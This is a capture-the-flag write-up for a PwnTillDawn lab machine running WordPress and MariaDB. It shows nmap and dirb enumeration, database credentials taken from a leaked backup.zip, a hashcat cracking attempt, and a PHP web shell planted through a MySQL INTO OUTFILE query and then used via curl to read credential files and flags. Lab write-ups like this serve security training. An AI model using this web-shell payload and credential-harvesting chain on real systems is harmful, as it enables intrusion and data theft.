.
.
As Always we start with a nmap scan.
E:\PENTEST\NMAP>nmap -A 10.150.150.145 Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 11:06 W. Europe Standard Time Nmap scan report for 10.150.150.145 Host is up (0.031s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 65:cc:32:50:bb:af:b4:8a:be:ff:b1:39:3c:dd:2c:e9 (RSA) | 256 f9:db:6f:49:63:d7:db:dd:42:42:86:36:c5:31:b1:07 (ECDSA) |_ 256 8e:74:a9:e3:fd:74:0c:c2:f7:14:85:81:a6:ba:fc:ce (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-generator: WordPress 4.9.12 |_http-server-header: Apache/2.4.25 (Debian) |_http-title: e-corp – Just another WordPress site 3306/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.1.26-MariaDB-0+deb9u1 | Thread ID: 33 | Capabilities flags: 63487 | Some Capabilities: ODBCClient, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, LongPassword, Speaks41ProtocolOld, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: (TQy0!PQ&h[pA3{54D92 |_ Auth Plugin Name: 103 Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.26 OS details: Linux 2.4.26 (Slackware 10.0.0) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 ... 2 31.00 ms 10.150.150.145 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.36 seconds E:\PENTEST\NMAP>
.
Then we gobuster it on extention zip
┌─[user@parrot-virtual]─[~/ptd] └──╼ $dirb http://10.150.150.145 -X .zip -w /usr/share/dirb/wordlists/common.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Feb 5 12:06:25 2021 URL_BASE: http://10.150.150.145/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Stopping on warning messages EXTENSIONS_LIST: (.zip) | (.zip) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.150.150.145/ ---- + http://10.150.150.145/backup.zip (CODE:200|SIZE:10187627) ----------------- END_TIME: Fri Feb 5 12:09:38 2021 DOWNLOADED: 4612 - FOUND: 1 ┌─[user@parrot-virtual]─[~/ptd]
we find: http://10.150.150.145/backup.zip
FLAG14 is inhere = e804bb2ca0c3d89ae027de4d86246130d9e3252c
and in wp-config in this zip is
/** MySQL database username */
define(‘DB_USER’, ‘wpmaster’);
/** MySQL database password */
define(‘DB_PASSWORD’, ‘-!UlTr4S3cUr3P455W0rd-!‘);
3306/tcp open mysql on 10.150.150.14
dbeaver to it
in tables=FLAG32_a40987757b60acc87e80196c757f2a19c8acc3b5
found for username eadmin : $P$B2auwafsSB05anAeWeHLNnAlk2hZLg1
tried hashcat
E:\PENTEST\hashcat>hashcat64.exe -O -m 400 -a 0 -o cracked.txt target_hashes.txt rockyou.txt –force
hashcat (v5.1.0) starting…
=> nothing found
Next inserted a web shell in sql
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"
.
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=ls
WordPress-Account.txt
backup.zip
c.php
cmd.php
conf
hallo.txt
hoi.txt
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20WordPress-Account.txt user: eAdmin password: 9r*WNyK7GUJ($bwi8G E:\PENTEST>
We login to the wordpress site as user eadmin, and we find there
FLAG23=8ea0d06e16bccc89922bf674d7a90297a5316fda — Draft
find . -iname “FLAG*”
=>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20.%20-iname%20%22FLAG*%22 ./wp-content/uploads/FLAG22.txt
.
http://10.150.150.145/wp-content/uploads/
=> found flag22 = 723d1a71be3d744bf84d9683c8df84f0fd916977
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20/%20-iname%20%22FLAG*%22 /home/webmaster/FLAG6.txt /sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/virtual/net/lo/flags /var/www/html/wp-content/uploads/FLAG22.txt /proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20/home/webmaster/FLAG6.txt%20/
6340427478524495dd30102486948aa7e01ae4d1
E:\PENTEST>
.
Reference how/where i uploaded a webshell
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"
.
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
Author : Puckiestyle